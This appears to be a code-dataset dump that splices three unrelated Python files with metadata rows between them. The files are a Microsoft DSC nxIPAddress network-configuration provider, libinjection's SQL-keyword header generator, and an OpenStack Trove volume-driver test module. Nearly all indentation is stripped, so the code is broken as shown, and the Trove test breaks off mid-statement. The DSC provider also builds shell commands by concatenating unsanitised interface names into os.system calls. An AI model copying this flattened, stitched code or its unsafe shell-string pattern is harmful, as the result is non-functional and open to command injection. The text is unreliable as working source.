def src_dicts_to_params(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if AddressFamily=='IPv4':
if 'NETMASK=' in self.ifcfg_dict.keys() and len(self.ifcfg_dict['NETMASK=']) > 0 :
PrefixLength=netmaskBitConversion(self.ifcfg_dict['NETMASK='])
elif PrefixLength != '' and PrefixLength > 0 and '/' in self.ifcfg_dict[self.addr_key] :
PrefixLength=int(self.ifcfg_dict[self.addr_key].split('/')[1])
self.ifcfg_dict[self.addr_key]=self.ifcfg_dict[self.addr_key].split('/')[0]
bootproto=''
if BootProtocol != None and len(BootProtocol) > 0 :
if self.ifcfg_dict['BOOTPROTO='] == 'dhcp':
bootproto='Automatic'
else:
bootproto='Static'
gateway=''
if len(self.gateway_dict['GATEWAY=']) >0:
gateway=self.gateway_dict['GATEWAY=']
return self.ifcfg_dict[self.addr_key],self.ifcfg_dict['DEVICE='],bootproto,gateway,Ensure,PrefixLength,AddressFamily
def restart_network(self,Interface):
os.system('ifdown ' + Interface)
os.system('ifup ' + Interface)
return [0]
def interface_down(self,Interface):
os.system('ifconfig ' + Interface + ' down')
return [0]
def UpdateValuesInFile(self,fname,src_dict,re_dict,Ensure):
updated=''
if os.path.exists(fname) != True:
# if this file is not here - we will create it
try:
F = open(fname,'w+')
F.write('# Created by Microsoft DSC nxIPAddress Provider\n')
F.close()
except:
raise
try:
F = open(fname,'r')
for l in F.readlines():
if l[0]=='#':
updated+=l
continue
for k in re_dict:
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
if len(src_dict[k])==0 :
l=''
re_dict[k]=None
break
else:
l=re.sub(re_dict[k],k+src_dict[k],l)
re_dict[k]=None
if len(l)>2:
updated+=l
for k in re_dict:
if re_dict[k] != None and len(src_dict[k]) > 0 :
l=k+src_dict[k]+'\n'
updated+=l
except:
raise
ReplaceFileContentsAtomic(fname,updated)
return [0]
def GetValuesFromFile(self,fname,src_dict,re_dict):
if os.path.exists(fname) != True:
return
try:
F = open(fname,'r')
for l in F.readlines():
for k in re_dict:
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
src_dict[k]=l.split(k[-1])[1].strip('\n')
re_dict[k]=None
F.close()
except:
raise
def Set(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
retval=[-1]
if len(self.ifcfg_prefix)>0:
self.ifcfg_file=self.ifcfg_prefix+InterfaceName
if len(self.gateway_prefix)>0:
self.gateway_file=self.gateway_prefix+InterfaceName
self.init_src_dicts(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
gateway_re_dict=self.init_re_dict(self.gateway_dict)
ifcfg_re_dict=self.init_re_dict(self.ifcfg_dict)
if Ensure == 'Absent':
if len(self.ifcfg_prefix)>0:
if os.path.exists(self.ifcfg_file):
os.remove(self.ifcfg_file)
retval=[0]
else:
retval=self.UpdateValuesInFile(self.ifcfg_file,self.ifcfg_dict,ifcfg_re_dict,Ensure)
if len(self.gateway_prefix)>0:
if os.path.exists(self.gateway_file):
os.remove(self.gateway_file)
retval=[0]
else:
retval=self.UpdateValuesInFile(self.gateway_file,self.gateway_dict,gateway_re_dict,Ensure)
self.interface_down(InterfaceName)
else:
retval=self.UpdateValuesInFile(self.gateway_file,self.gateway_dict,gateway_re_dict,Ensure)
retval=self.UpdateValuesInFile(self.ifcfg_file,self.ifcfg_dict,ifcfg_re_dict,Ensure)
retval=self.restart_network(InterfaceName)
return retval
def Test(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if len(self.ifcfg_prefix)>0:
self.ifcfg_file=self.ifcfg_prefix+InterfaceName
if len(self.gateway_prefix)>0:
self.gateway_file=self.gateway_prefix+InterfaceName
self.init_src_dicts(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
test_gateway=dict(self.gateway_dict)
for k in test_gateway:
test_gateway[k]=''
test_gateway_re_dict=self.init_re_dict(self.gateway_dict)
self.GetValuesFromFile(self.gateway_file,test_gateway,test_gateway_re_dict)
for k in self.gateway_dict:
if k == 'default ' and len(self.gateway_dict[k]) >0: # SuSE
self.gateway_dict[k]=self.gateway_dict[k].split(' ')[0]
if self.gateway_dict[k] != test_gateway[k]:
return [-1]
test_ifcfg=dict(self.ifcfg_dict)
for k in test_ifcfg:
if k != 'iface ':
test_ifcfg[k]=''
test_ifcfg_re_dict=self.init_re_dict(self.ifcfg_dict)
self.GetValuesFromFile(self.ifcfg_file,test_ifcfg,test_ifcfg_re_dict)
if Ensure == 'Absent':
if 'iface ' in test_ifcfg.keys() and test_ifcfg['iface ']!=None and len(test_ifcfg['iface '])>0:
return [-1]
elif len(self.ifcfg_prefix)>0 and os.path.exists(self.ifcfg_file) :
return [-1]
else:
return [0]
for k in self.ifcfg_dict:
if self.ifcfg_dict[k] != test_ifcfg[k]:
return [-1]
return [0]
def Get(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
# calling Test here will fill the dicts with values
self.Test(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
self.src_dicts_to_params(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if PrefixLength=='':
PrefixLength=0
return 0,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
class SuSEDistro(AbstractDistro):
def __init__(self):
super(SuSEDistro,self).__init__()
self.gateway_prefix='/etc/sysconfig/network/ifroute-'
self.ifcfg_prefix='/etc/sysconfig/network/ifcfg-'
def init_src_dicts(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
self.gateway_v4_dict=dict()
self.gateway_v6_dict=dict()
if BootProtocol.lower() != 'static' or len(DefaultGateway) == 0:
self.gateway_v4_dict['default ']=''
self.gateway_v6_dict['default ']=''
else:
self.gateway_v4_dict['default ']=DefaultGateway+' '+bitNetmaskConversion(PrefixLength)+' '+InterfaceName
self.gateway_v6_dict['default ']=DefaultGateway+' '+InterfaceName
self.ifcfg_v4_dict=dict()
if BootProtocol.lower() != 'static':
self.ifcfg_v4_dict['BOOTPROTO=']='dhcp'
else:
self.ifcfg_v4_dict['BOOTPROTO=']='static'
self.ifcfg_v4_dict['STARTMODE=']='auto'
self.ifcfg_v4_dict['IPADDR=']=IPAddress
self.ifcfg_v4_dict['NETMASK=']=bitNetmaskConversion(PrefixLength)
self.ifcfg_v6_dict=dict()
if BootProtocol.lower() != 'static':
self.ifcfg_v6_dict['BOOTPROTO=']='autoip'
else:
self.ifcfg_v6_dict['BOOTPROTO=']='static'
self.ifcfg_v6_dict['STARTMODE=']='auto'
if PrefixLength != 0 and PrefixLength != '':
self.ifcfg_v6_dict['IPADDR=']=IPAddress+'/'+str(PrefixLength)
else:
self.ifcfg_v6_dict['IPADDR=']=IPAddress
if AddressFamily == 'IPv4':
self.ifcfg_dict=self.ifcfg_v4_dict
self.addr_key='IPADDR='
self.gateway_dict=self.gateway_v4_dict
else :
self.ifcfg_dict=self.ifcfg_v6_dict
self.addr_key='IPADDR='
self.gateway_dict=self.gateway_v6_dict
def src_dicts_to_params(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if AddressFamily=='IPv4':
if 'NETMASK=' in self.ifcfg_dict.keys() and len(self.ifcfg_dict['NETMASK=']) > 0 :
PrefixLength=netmaskBitConversion(self.ifcfg_dict['NETMASK='])
elif PrefixLength != '' and PrefixLength > 0 and '/' in self.ifcfg_dict[self.addr_key] :
PrefixLength=int(self.ifcfg_dict[self.addr_key].split('/')[1])
self.ifcfg_dict[self.addr_key]=self.ifcfg_dict[self.addr_key].split('/')[0]
bootproto=''
if BootProtocol != '' and 'BOOTPROTO=' in self.ifcfg_v4_dict.keys() and len(self.ifcfg_v4_dict['BOOTPROTO=']) >0 :
if self.ifcfg_v4_dict['BOOTPROTO='] != 'static':
bootproto='Automatic'
else:
bootproto='Static'
gateway=''
# The gateway line here for SuSE is 'default <addr> <interface>'.
# Remove the <interface> so it can match <addr>.
if len(self.gateway_dict['default ']) >0:
gateway=self.gateway_dict['default '].split(' ')[0]
return self.ifcfg_dict['IPADDR='],self.ifcfg_file.split('-')[-1],bootproto,gateway,Ensure,PrefixLength,AddressFamily
def restart_network(self,Interface):
os.system('ifdown ' + Interface)
os.system('ifup ' + Interface)
return [0]
class debianDistro(AbstractDistro):
def __init__(self):
super(debianDistro,self).__init__()
self.ifcfg_prefix=''
self.gateway_prefix=''
self.ifcfg_file='/etc/network/interfaces'
self.gateway_file='/etc/network/interfaces'
def init_re_dict(self,src_dict):
re_dict=dict()
for k in src_dict:
re_dict[k]=re.compile(r'\s*'+k+'.*')
if 'iface ' in re_dict:
re_dict['iface ']=re.compile(r'\s*iface '+src_dict['iface '])
if 'inet ' in re_dict:
re_dict['inet ']=re.compile(r'\s*iface '+src_dict['iface '] + ' inet .*')
if 'inet6 ' in re_dict:
re_dict['inet6 ']=re.compile(r'\s*iface '+src_dict['iface '] + ' inet6 .*')
return re_dict
def init_src_dicts(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
self.ifcfg_v4_dict={}
self.ifcfg_v6_dict={}
self.gateway_dict={}
if BootProtocol.lower() == 'static' :
self.ifcfg_v4_dict['inet '] = 'static'
elif BootProtocol.lower() == 'automatic':
self.ifcfg_v4_dict['inet '] = 'dhcp'
else:
self.ifcfg_v4_dict['inet '] = ''
self.ifcfg_v4_dict['iface ']=InterfaceName
self.ifcfg_v4_dict['autoconf ']=''
self.ifcfg_v4_dict['network ']=''
self.ifcfg_v4_dict['address ']=IPAddress
if PrefixLength !=0 and PrefixLength != '':
self.ifcfg_v4_dict['netmask ']=bitNetmaskConversion(PrefixLength)
self.ifcfg_v6_dict['netmask ']=str(PrefixLength)
else:
self.ifcfg_v4_dict['netmask ']=''
self.ifcfg_v6_dict['netmask ']=''
self.ifcfg_v4_dict['gateway ']=DefaultGateway
if len(BootProtocol) > 0:
self.ifcfg_v6_dict['inet6 ']='static' # static is used for autoconf as well
else:
self.ifcfg_v6_dict['inet6 ']=''
self.ifcfg_v6_dict['iface ']=InterfaceName
if PrefixLength !=0 and PrefixLength != '':
self.ifcfg_v6_dict['address ']=IPAddress
else:
self.ifcfg_v6_dict['address ']=IPAddress
self.ifcfg_v6_dict['gateway ']=DefaultGateway
if AddressFamily == "IPv4":
self.ifcfg_dict=self.ifcfg_v4_dict
self.inet='inet '
else:
if BootProtocol.lower() != 'static':
self.ifcfg_v6_dict['autoconf ']='1'
else:
self.ifcfg_v6_dict['autoconf ']='0'
self.ifcfg_dict=self.ifcfg_v6_dict
self.inet='inet6 '
if Ensure == "Absent":
auto='auto '+InterfaceName
self.ifcfg_dict[auto]=''
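    # Illustrative only: for a static IPv4 address the dictionaries above
    # correspond to an /etc/network/interfaces stanza roughly like:
    #   auto eth0
    #   iface eth0 inet static
    #   address 192.168.1.20
    #   netmask 255.255.255.0
    #   gateway 192.168.1.1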
def src_dicts_to_params(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
inet=''
if BootProtocol != None and len(BootProtocol) > 0 :
if AddressFamily=='IPv6':
if self.ifcfg_dict['autoconf '] == '1' :
inet = 'Automatic'
else:
inet = 'Static'
else:
if self.ifcfg_dict[self.inet] == 'dhcp':
inet = 'Automatic'
else:
inet = 'Static'
if AddressFamily=='IPv4':
            if 'netmask ' in self.ifcfg_dict.keys() and len(self.ifcfg_dict['netmask ']) > 0 :
                PrefixLength=netmaskBitConversion(self.ifcfg_dict['netmask '])
elif PrefixLength != '' and PrefixLength > 0 and '/' in self.ifcfg_dict['address '] :
PrefixLength=int(self.ifcfg_dict['address '].split('/')[1])
self.ifcfg_dict['address ']=self.ifcfg_dict['address '].split('/')[0]
gateway=''
if len(self.ifcfg_dict['gateway ']) >0:
gateway=self.ifcfg_dict['gateway ']
return self.ifcfg_dict['address '],self.ifcfg_dict['iface '],inet,gateway,Ensure,PrefixLength,AddressFamily
def restart_network(self,Interface):
os.system('ifdown --exclude=lo ' + Interface +'; ifup --exclude=lo '+ Interface)
return [0]
def UpdateValuesInFile(self,fname,src_dict,re_dict,Ensure):
if len(src_dict) == 0:
return [0]
removing=False
if self.inet in src_dict.keys() and Ensure=='Absent': # we are trying to remove
removing=True
if removing == False and os.path.exists(fname) != True:
# if this file is not here - we will create it
try:
F = open(fname,'w+')
                F.write('# Created by nxIPAddress DSC Provider\n')
F.close()
except:
raise
try:
F = open(fname,'r')
txt=F.read()
if 'iface ' in src_dict.keys():
srch=r'(^auto '+src_dict['iface ']+'$.*?^iface '+src_dict['iface ']+'.*?$|^iface '+src_dict['iface ']+'.*?$).*?((^auto )|(^iface )|(^$))'
updated=''
r=re.search(srch,txt,flags=re.S|re.M)
if r == None:
if removing: #nothing to remove
return [0]
else : # append values to the end
l='auto ' + src_dict['iface '] + '\niface '+src_dict['iface '] + ' ' + self.inet+src_dict[self.inet] + '\n'
if len(updated) > 0 and updated[-1] != '\n':
updated+='\n'
updated+=l
re_dict['iface ']=None
re_dict[self.inet]=None
for k in re_dict:
if re_dict[k] != None and len(src_dict[k]) > 0 :
l=k+src_dict[k]+'\n'
updated+=l
txt=txt+updated
else: #matched
if removing:
tail=''
rpl=re.compile(r.group(0),flags=re.S|re.M)
txt=rpl.sub(tail,txt)
if txt[-2:] == '\n\n':
txt=txt[:-1]
else : # replace tags - preserve unknown tags
t=r.group(0)
for l in t.splitlines():
if len(l)>1:
l+='\n'
else:
continue
if 'iface ' in re_dict.keys() and re_dict['iface '] != None :
if re.match(re_dict['iface '],l) :
l='iface '+src_dict['iface '] + ' ' + self.inet+src_dict[self.inet] + '\n'
re_dict['iface ']=None
re_dict[self.inet]=None
updated+=l
continue
for k in re_dict.keys():
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
if len(src_dict[k])==0 :
l=''
else:
l=re.sub(re_dict[k],k+src_dict[k],l)
if len(l)>0 and l[-1]!='\n':
l+='\n'
re_dict[k]=None
break
if len(l)>2:
updated+=l
for k in re_dict:
if re_dict[k] != None and len(src_dict[k]) > 0 :
l=k+src_dict[k]+'\n'
updated+=l
tail=''
if updated[-1] != '\n':
tail='\n'
updated+=tail
rpl=re.compile(r.group(0),flags=re.S|re.M)
txt=rpl.sub(updated,txt)
if txt[-2:] == '\n\n':
txt=txt[:-1]
F.close()
except:
raise
ReplaceFileContentsAtomic(fname,txt)
return [0]
def GetValuesFromFile(self,fname,src_dict,re_dict):
if os.path.exists(fname) != True:
return
try:
F = open(fname,'r')
txt=F.read()
if 'iface ' in src_dict.keys():
srch=r'(^auto '+src_dict['iface ']+'$.*?^iface '+src_dict['iface ']+'.*?$|^iface '+src_dict['iface ']+'.*?$).*?((^auto )|(^iface )|(^$))'
r=re.search(srch,txt,flags=re.S|re.M)
if r == None:
return
txt=r.group(0)
for l in txt.splitlines():
for k in re_dict:
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
if k == self.inet:
src_dict[k]=l.split(k[-1])[3].strip('\n')
else:
src_dict[k]=l.split(k[-1])[1].strip('\n')
re_dict[k]=None
F.close()
except:
raise
class redhatDistro(AbstractDistro):
def __init__(self):
super(redhatDistro,self).__init__()
class centosDistro(redhatDistro):
def __init__(self):
super(centosDistro,self).__init__()
class UbuntuDistro(debianDistro):
def __init__(self):
super(UbuntuDistro,self).__init__()
class LinuxMintDistro(UbuntuDistro):
def __init__(self):
super(LinuxMintDistro,self).__init__()
class fedoraDistro(redhatDistro):
def __init__(self):
super(fedoraDistro,self).__init__()
| mit | 2,256,311,520,288,610,000 | 42.291667 | 201 | 0.559801 | false |
fengjian/libinjection | src/sqlparse2c.py | 3 | 3800 | #!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# nickg@client9.com
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to a C header (.h) file
"""
import sys
def toc(obj):
""" main routine """
print """
#ifndef LIBINJECTION_SQLI_DATA_H
#define LIBINJECTION_SQLI_DATA_H
#include "libinjection.h"
#include "libinjection_sqli.h"
typedef struct {
const char *word;
char type;
} keyword_t;
static size_t parse_money(sfilter * sf);
static size_t parse_other(sfilter * sf);
static size_t parse_white(sfilter * sf);
static size_t parse_operator1(sfilter *sf);
static size_t parse_char(sfilter *sf);
static size_t parse_hash(sfilter *sf);
static size_t parse_dash(sfilter *sf);
static size_t parse_slash(sfilter *sf);
static size_t parse_backslash(sfilter * sf);
static size_t parse_operator2(sfilter *sf);
static size_t parse_string(sfilter *sf);
static size_t parse_word(sfilter * sf);
static size_t parse_var(sfilter * sf);
static size_t parse_number(sfilter * sf);
static size_t parse_tick(sfilter * sf);
static size_t parse_ustring(sfilter * sf);
static size_t parse_qstring(sfilter * sf);
static size_t parse_nqstring(sfilter * sf);
static size_t parse_xstring(sfilter * sf);
static size_t parse_bstring(sfilter * sf);
static size_t parse_estring(sfilter * sf);
static size_t parse_bword(sfilter * sf);
"""
#
# Mapping of character to function
#
fnmap = {
'CHAR_WORD' : 'parse_word',
'CHAR_WHITE': 'parse_white',
'CHAR_OP1' : 'parse_operator1',
'CHAR_UNARY': 'parse_operator1',
'CHAR_OP2' : 'parse_operator2',
'CHAR_BANG' : 'parse_operator2',
'CHAR_BACK' : 'parse_backslash',
'CHAR_DASH' : 'parse_dash',
'CHAR_STR' : 'parse_string',
'CHAR_HASH' : 'parse_hash',
'CHAR_NUM' : 'parse_number',
'CHAR_SLASH': 'parse_slash',
'CHAR_SEMICOLON' : 'parse_char',
'CHAR_COMMA': 'parse_char',
'CHAR_LEFTPARENS': 'parse_char',
'CHAR_RIGHTPARENS': 'parse_char',
'CHAR_LEFTBRACE': 'parse_char',
'CHAR_RIGHTBRACE': 'parse_char',
'CHAR_VAR' : 'parse_var',
'CHAR_OTHER': 'parse_other',
'CHAR_MONEY': 'parse_money',
'CHAR_TICK' : 'parse_tick',
'CHAR_UNDERSCORE': 'parse_underscore',
'CHAR_USTRING' : 'parse_ustring',
'CHAR_QSTRING' : 'parse_qstring',
'CHAR_NQSTRING' : 'parse_nqstring',
'CHAR_XSTRING' : 'parse_xstring',
'CHAR_BSTRING' : 'parse_bstring',
'CHAR_ESTRING' : 'parse_estring',
'CHAR_BWORD' : 'parse_bword'
}
print
print "typedef size_t (*pt2Function)(sfilter *sf);"
print "static const pt2Function char_parse_map[] = {"
pos = 0
for character in obj['charmap']:
print " &%s, /* %d */" % (fnmap[character], pos)
pos += 1
print "};"
print
# keywords
# load them
keywords = obj['keywords']
for fingerprint in list(obj[u'fingerprints']):
fingerprint = '0' + fingerprint.upper()
keywords[fingerprint] = 'F'
needhelp = []
for key in keywords.iterkeys():
if key != key.upper():
needhelp.append(key)
for key in needhelp:
tmpv = keywords[key]
del keywords[key]
keywords[key.upper()] = tmpv
print "static const keyword_t sql_keywords[] = {"
for k in sorted(keywords.keys()):
if len(k) > 31:
sys.stderr.write("ERROR: keyword greater than 32 chars\n")
sys.exit(1)
print " {\"%s\", '%s'}," % (k, keywords[k])
print "};"
print "static const size_t sql_keywords_sz = %d;" % (len(keywords), )
print "#endif"
return 0
if __name__ == '__main__':
import json
sys.exit(toc(json.load(sys.stdin)))
| bsd-3-clause | -4,710,446,708,618,401,000 | 27.787879 | 73 | 0.604211 | false |
zhangg/trove | integration/tests/integration/tests/volumes/driver.py | 1 | 21014 | # Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from numbers import Number
import os
import re
import shutil
import six
import socket
import time
import unittest
import pexpect
from proboscis import test
from proboscis.asserts import assert_raises
from proboscis.decorators import expect_exception
from proboscis.decorators import time_out
from trove.tests.config import CONFIG
from trove.common.utils import poll_until
from trove.tests.util import process
from trove.common.utils import import_class
from tests import initialize
WHITE_BOX = CONFIG.white_box
VOLUMES_DRIVER = "trove.volumes.driver"
if WHITE_BOX:
# TODO(tim.simpson): Restore this once white box functionality can be
# added back to this test module.
pass
# from nova import context
# from nova import exception
# from nova import flags
# from nova import utils
# from trove import exception as trove_exception
# from trove.utils import poll_until
# from trove import volume
# from trove.tests.volume import driver as test_driver
# FLAGS = flags.FLAGS
UUID_PATTERN = re.compile('^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-'
'[0-9a-f]{4}-[0-9a-f]{12}$')
HUGE_VOLUME = 5000
def is_uuid(text):
return UUID_PATTERN.search(text) is not None
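# Illustrative examples (lowercase hex, 8-4-4-4-12 groups):
#   is_uuid('12345678-1234-1234-1234-123456789abc') -> True
#   is_uuid('not-a-uuid')                           -> False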
class StoryDetails(object):
def __init__(self):
self.api = volume.API()
self.client = volume.Client()
self.context = context.get_admin_context()
self.device_path = None
self.volume_desc = None
self.volume_id = None
self.volume_name = None
self.volume = None
self.host = socket.gethostname()
self.original_uuid = None
self.original_device_info = None
self.resize_volume_size = 2
def get_volume(self):
return self.api.get(self.context, self.volume_id)
@property
def mount_point(self):
return "%s/%s" % (LOCAL_MOUNT_PATH, self.volume_id)
@property
def test_mount_file_path(self):
return "%s/test.txt" % self.mount_point
story = None
storyFail = None
LOCAL_MOUNT_PATH = "/testsmnt"
class VolumeTest(unittest.TestCase):
"""This test tells the story of a volume, from cradle to grave."""
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
def setUp(self):
global story, storyFail
self.story = story
self.storyFail = storyFail
def assert_volume_as_expected(self, volume):
self.assertIsInstance(volume["id"], Number)
self.assertEqual(self.story.volume_name, volume["display_name"])
self.assertEqual(self.story.volume_desc, volume["display_description"])
self.assertEqual(1, volume["size"])
self.assertEqual(self.story.context.user_id, volume["user_id"])
self.assertEqual(self.story.context.project_id, volume["project_id"])
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[initialize.start_volume])
class SetUp(VolumeTest):
def test_05_create_story(self):
"""Creating 'story' vars used by the rest of these tests."""
global story, storyFail
story = StoryDetails()
storyFail = StoryDetails()
@time_out(60)
def test_10_wait_for_topics(self):
"""Wait until the volume topic is up before proceeding."""
topics = ["volume"]
from tests.util.topics import hosts_up
while not all(hosts_up(topic) for topic in topics):
pass
def test_20_refresh_local_folders(self):
"""Delete the local folders used as mount locations if they exist."""
if os.path.exists(LOCAL_MOUNT_PATH):
#TODO(rnirmal): Also need to remove any existing mounts.
shutil.rmtree(LOCAL_MOUNT_PATH)
os.mkdir(LOCAL_MOUNT_PATH)
# Give some time for the services to startup
time.sleep(10)
@time_out(60)
def test_30_mgmt_volume_check(self):
"""Get the volume information from the mgmt API"""
story_context = self.story.context
device_info = self.story.api.get_storage_device_info(story_context)
print("device_info : %r" % device_info)
self.assertNotEqual(device_info, None,
"the storage device information should exist")
self.story.original_device_info = device_info
@time_out(60)
def test_31_mgmt_volume_info(self):
"""Check the available space against the mgmt API info."""
story_context = self.story.context
device_info = self.story.api.get_storage_device_info(story_context)
print("device_info : %r" % device_info)
info = {'spaceTotal': device_info['raw_total'],
'spaceAvail': device_info['raw_avail']}
self._assert_available_space(info)
def _assert_available_space(self, device_info, fail=False):
"""
        Given the SAN device_info (fake or not), run the free-space assertions.
"""
print("DEVICE_INFO on SAN : %r" % device_info)
# Calculate the GBs; Divide by 2 for the FLAGS.san_network_raid_factor
gbs = 1.0 / 1024 / 1024 / 1024 / 2
total = int(device_info['spaceTotal']) * gbs
free = int(device_info['spaceAvail']) * gbs
used = total - free
usable = total * (FLAGS.san_max_provision_percent * 0.01)
real_free = float(int(usable - used))
print("total : %r" % total)
print("free : %r" % free)
print("used : %r" % used)
print("usable : %r" % usable)
print("real_free : %r" % real_free)
check_space = self.story.api.check_for_available_space
self.assertFalse(check_space(self.story.context, HUGE_VOLUME))
self.assertFalse(check_space(self.story.context, real_free + 1))
if fail:
self.assertFalse(check_space(self.story.context, real_free))
self.assertFalse(check_space(self.story.context, real_free - 1))
self.assertFalse(check_space(self.story.context, 1))
else:
self.assertTrue(check_space(self.story.context, real_free))
self.assertTrue(check_space(self.story.context, real_free - 1))
self.assertTrue(check_space(self.story.context, 1))
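# Editor's aside (illustrative arithmetic, not part of the original test): with a
# hypothetical SAN reporting spaceTotal of 4 TiB and spaceAvail of 3 TiB raw, the
# divide-by-two RAID factor gives total=2048 GB, free=1536 GB and used=512 GB; if
# FLAGS.san_max_provision_percent were 80, usable would be 1638.4 GB and real_free
# 1126.0 GB -- the boundary the check_space asserts above probe on either side of.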
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[SetUp])
class AddVolumeFailure(VolumeTest):
@time_out(60)
def test_add(self):
"""
Make call to FAIL a prov. volume and assert the return value is a
FAILURE.
"""
self.assertIsNone(self.storyFail.volume_id)
name = "TestVolume"
desc = "A volume that was created for testing."
self.storyFail.volume_name = name
self.storyFail.volume_desc = desc
volume = self.storyFail.api.create(self.storyFail.context,
size=HUGE_VOLUME,
snapshot_id=None, name=name,
description=desc)
self.assertEqual(HUGE_VOLUME, volume["size"])
self.assertTrue("creating", volume["status"])
self.assertTrue("detached", volume["attach_status"])
self.storyFail.volume = volume
self.storyFail.volume_id = volume["id"]
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[AddVolumeFailure])
class AfterVolumeFailureIsAdded(VolumeTest):
"""Check that the volume can be retrieved via the API, and setup.
All we want to see returned is a list-like with an initial string.
"""
@time_out(120)
def test_api_get(self):
"""Wait until the volume is a FAILURE."""
volume = poll_until(lambda: self.storyFail.get_volume(),
lambda volume: volume["status"] != "creating")
self.assertEqual(volume["status"], "error")
self.assertTrue(volume["attach_status"], "detached")
@time_out(60)
def test_mgmt_volume_check(self):
"""Get the volume information from the mgmt API"""
info = self.story.api.get_storage_device_info(self.story.context)
print("device_info : %r" % info)
self.assertNotEqual(info, None,
"the storage device information should exist")
self.assertEqual(self.story.original_device_info['raw_total'],
info['raw_total'])
self.assertEqual(self.story.original_device_info['raw_avail'],
info['raw_avail'])
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[SetUp])
class AddVolume(VolumeTest):
@time_out(60)
def test_add(self):
"""Make call to prov. a volume and assert the return value is OK."""
self.assertIsNone(self.story.volume_id)
name = "TestVolume"
desc = "A volume that was created for testing."
self.story.volume_name = name
self.story.volume_desc = desc
volume = self.story.api.create(self.story.context, size=1,
snapshot_id=None, name=name,
description=desc)
self.assert_volume_as_expected(volume)
self.assertTrue("creating", volume["status"])
self.assertTrue("detached", volume["attach_status"])
self.story.volume = volume
self.story.volume_id = volume["id"]
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[AddVolume])
class AfterVolumeIsAdded(VolumeTest):
"""Check that the volume can be retrieved via the API, and setup.
All we want to see returned is a list-like with an initial string.
"""
@time_out(120)
def test_api_get(self):
"""Wait until the volume is finished provisioning."""
volume = poll_until(lambda: self.story.get_volume(),
lambda volume: volume["status"] != "creating")
self.assertEqual(volume["status"], "available")
self.assert_volume_as_expected(volume)
self.assertTrue(volume["attach_status"], "detached")
@time_out(60)
def test_mgmt_volume_check(self):
"""Get the volume information from the mgmt API"""
print("self.story.original_device_info : %r" %
self.story.original_device_info)
info = self.story.api.get_storage_device_info(self.story.context)
print("device_info : %r" % info)
self.assertNotEqual(info, None,
"the storage device information should exist")
self.assertEqual(self.story.original_device_info['raw_total'],
info['raw_total'])
volume_size = int(self.story.volume['size']) * (1024 ** 3) * 2
print("volume_size: %r" % volume_size)
print("self.story.volume['size']: %r" % self.story.volume['size'])
avail = int(self.story.original_device_info['raw_avail']) - volume_size
print("avail space: %r" % avail)
self.assertEqual(int(info['raw_avail']), avail)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[AfterVolumeIsAdded])
class SetupVolume(VolumeTest):
@time_out(60)
def test_assign_volume(self):
"""Tell the volume it belongs to this host node."""
#TODO(tim.simpson) If this is important, could we add a test to
# make sure some kind of exception is thrown if it
# isn't added to certain drivers?
self.assertNotEqual(None, self.story.volume_id)
self.story.api.assign_to_compute(self.story.context,
self.story.volume_id,
self.story.host)
@time_out(60)
def test_setup_volume(self):
"""Set up the volume on this host. AKA discovery."""
self.assertNotEqual(None, self.story.volume_id)
device = self.story.client._setup_volume(self.story.context,
self.story.volume_id,
self.story.host)
if not isinstance(device, six.string_types):
self.fail("Expected device to be a string, but instead it was " +
str(type(device)) + ".")
self.story.device_path = device
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[SetupVolume])
class FormatVolume(VolumeTest):
@expect_exception(IOError)
@time_out(60)
def test_10_should_raise_IOError_if_format_fails(self):
"""
Tests that if the driver's _format method fails, its
public format method will perform an assertion properly, discover
it failed, and raise an exception.
"""
volume_driver_cls = import_class(FLAGS.volume_driver)
class BadFormatter(volume_driver_cls):
def _format(self, device_path):
pass
bad_client = volume.Client(volume_driver=BadFormatter())
bad_client._format(self.story.device_path)
@time_out(60)
def test_20_format(self):
self.assertNotEqual(None, self.story.device_path)
self.story.client._format(self.story.device_path)
def test_30_check_options(self):
cmd = ("sudo dumpe2fs -h %s 2> /dev/null | "
"awk -F ':' '{ if($1 == \"Reserved block count\") "
